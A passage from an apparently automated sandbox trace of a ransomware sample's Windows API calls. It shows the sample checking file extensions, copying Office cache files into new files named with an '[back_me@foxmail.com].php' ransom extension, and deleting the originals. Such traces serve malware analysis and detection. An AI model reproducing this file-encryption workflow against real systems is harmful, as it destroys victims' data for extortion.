lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString=".docx") returned 5 [0036.593] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.593] lstrlenW (lpString=".pdf") returned 4 [0036.593] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString=".xls") returned 4 [0036.593] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString=".xlsx") returned 5 [0036.593] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.594] lstrlenW (lpString=".ppt") returned 4 [0036.594] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.594] lstrlenW (lpString=".zip") returned 4 [0036.594] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.594] lstrlenW (lpString=".rar") returned 4 [0036.594] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.594] lstrlenW (lpString=".bz2") returned 4 [0036.594] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.594] lstrlenW (lpString=".7z") returned 3 [0036.594] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.594] lstrlenW (lpString=".dbf") returned 4 [0036.594] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.594] lstrlenW (lpString=".1cd") returned 4 [0036.594] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.594] lstrlenW (lpString=".jpg") returned 4 [0036.594] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.594] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0036.594] lstrlenW (lpString="Setup.xml") returned 9 [0036.594] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.595] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=9352) returned 1 [0036.595] CloseHandle (hObject=0x1c0) returned 1 [0036.595] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.595] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.595] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.595] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.595] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.595] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0036.595] GetLastError () returned 0x0 [0036.595] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x2488, lpOverlapped=0x0) returned 1 [0036.658] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0036.659] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.659] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.659] SetEndOfFile (hFile=0x1fc) returned 1 [0036.659] CloseHandle (hObject=0x1fc) returned 1 [0036.660] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.660] SetEndOfFile (hFile=0x1c0) returned 1 [0036.661] CloseHandle (hObject=0x1c0) returned 1 [0036.661] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.661] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.661] lstrlenW (lpString=".doc") returned 4 [0036.661] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.661] lstrlenW (lpString=".docx") returned 5 [0036.661] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.661] lstrlenW (lpString=".pdf") returned 4 [0036.661] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.661] lstrlenW (lpString=".xls") returned 4 [0036.661] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.661] lstrlenW (lpString=".xlsx") returned 5 [0036.661] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.662] lstrlenW (lpString=".ppt") returned 4 [0036.662] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString=".zip") returned 4 [0036.662] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.662] lstrlenW (lpString=".rar") returned 4 [0036.662] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString=".bz2") returned 4 [0036.662] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString=".7z") returned 3 [0036.662] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString=".dbf") returned 4 [0036.662] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString=".1cd") returned 4 [0036.662] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString=".jpg") returned 4 [0036.662] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.662] lstrlenW (lpString=".doc") returned 4 [0036.662] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString=".docx") returned 5 [0036.662] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.662] lstrlenW (lpString=".pdf") returned 4 [0036.662] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString=".xls") returned 4 [0036.662] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.662] lstrlenW (lpString=".xlsx") returned 5 [0036.662] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.662] lstrlenW (lpString=".ppt") returned 4 [0036.663] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.663] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.663] lstrlenW (lpString=".zip") returned 4 [0036.663] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.663] lstrlenW (lpString=".rar") returned 4 [0036.663] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.663] lstrlenW (lpString=".bz2") returned 4 [0036.663] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.663] lstrlenW (lpString=".7z") returned 3 [0036.663] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.663] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.663] lstrlenW (lpString=".dbf") returned 4 [0036.663] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.663] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.663] lstrlenW (lpString=".1cd") returned 4 [0036.663] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.663] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.663] lstrlenW (lpString=".jpg") returned 4 [0036.663] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.663] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0036.663] lstrlenW (lpString="Setup.xml") returned 9 [0036.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.664] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2624) returned 1 [0036.664] CloseHandle (hObject=0x1c0) returned 1 [0036.664] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.664] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.664] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.664] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.664] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.664] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0036.664] GetLastError () returned 0x0 [0036.664] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xa40, lpOverlapped=0x0) returned 1 [0036.991] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0037.283] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.283] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.283] SetEndOfFile (hFile=0x1fc) returned 1 [0037.283] CloseHandle (hObject=0x1fc) returned 1 [0037.284] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.284] SetEndOfFile (hFile=0x1c0) returned 1 [0037.285] CloseHandle (hObject=0x1c0) returned 1 [0037.285] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.285] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.285] lstrlenW (lpString=".doc") returned 4 [0037.285] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.285] lstrlenW (lpString=".docx") returned 5 [0037.285] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.285] lstrlenW (lpString=".pdf") returned 4 [0037.285] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.285] lstrlenW (lpString=".xls") returned 4 [0037.285] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.285] lstrlenW (lpString=".xlsx") returned 5 [0037.285] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.285] lstrlenW (lpString=".ppt") returned 4 [0037.286] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString=".zip") returned 4 [0037.286] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.286] lstrlenW (lpString=".rar") returned 4 [0037.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString=".bz2") returned 4 [0037.286] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString=".7z") returned 3 [0037.286] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString=".dbf") returned 4 [0037.286] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString=".1cd") returned 4 [0037.286] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString=".jpg") returned 4 [0037.286] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.286] lstrlenW (lpString=".doc") returned 4 [0037.286] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.286] lstrlenW (lpString=".docx") returned 5 [0037.286] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.286] lstrlenW (lpString=".pdf") returned 4 [0037.287] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString=".xls") returned 4 [0037.287] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString=".xlsx") returned 5 [0037.287] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.287] lstrlenW (lpString=".ppt") returned 4 [0037.287] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.287] lstrlenW (lpString=".zip") returned 4 [0037.287] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.287] lstrlenW (lpString=".rar") returned 4 [0037.287] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString=".bz2") returned 4 [0037.287] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString=".7z") returned 3 [0037.287] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.287] lstrlenW (lpString=".dbf") returned 4 [0037.287] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.287] lstrlenW (lpString=".1cd") returned 4 [0037.287] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.287] lstrlenW (lpString=".jpg") returned 4 [0037.287] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.287] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.287] lstrlenW (lpString="Office32WW.xml") returned 14 [0037.287] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.289] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=4274) returned 1 [0037.289] CloseHandle (hObject=0x1c0) returned 1 [0037.289] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0037.289] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.289] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.289] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.289] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.289] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0037.290] GetLastError () returned 0x0 [0037.290] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0037.291] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0037.292] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.292] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.292] SetEndOfFile (hFile=0x1fc) returned 1 [0037.292] CloseHandle (hObject=0x1fc) returned 1 [0037.293] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.293] SetEndOfFile (hFile=0x1c0) returned 1 [0037.294] CloseHandle (hObject=0x1c0) returned 1 [0037.294] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.294] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0037.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.294] lstrlenW (lpString=".doc") returned 4 [0037.294] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.294] lstrlenW (lpString=".docx") returned 5 [0037.294] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.294] lstrlenW (lpString=".pdf") returned 4 [0037.294] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.294] lstrlenW (lpString=".xls") returned 4 [0037.294] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.294] lstrlenW (lpString=".xlsx") returned 5 [0037.294] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.294] lstrlenW (lpString=".ppt") returned 4 [0037.294] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.294] lstrlenW (lpString=".zip") returned 4 [0037.294] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.294] lstrlenW (lpString=".rar") returned 4 [0037.295] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".bz2") returned 4 [0037.295] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".7z") returned 3 [0037.295] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString=".dbf") returned 4 [0037.295] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString=".1cd") returned 4 [0037.295] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString=".jpg") returned 4 [0037.295] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString=".doc") returned 4 [0037.295] lstrcmpiW (lpString1=".doc", 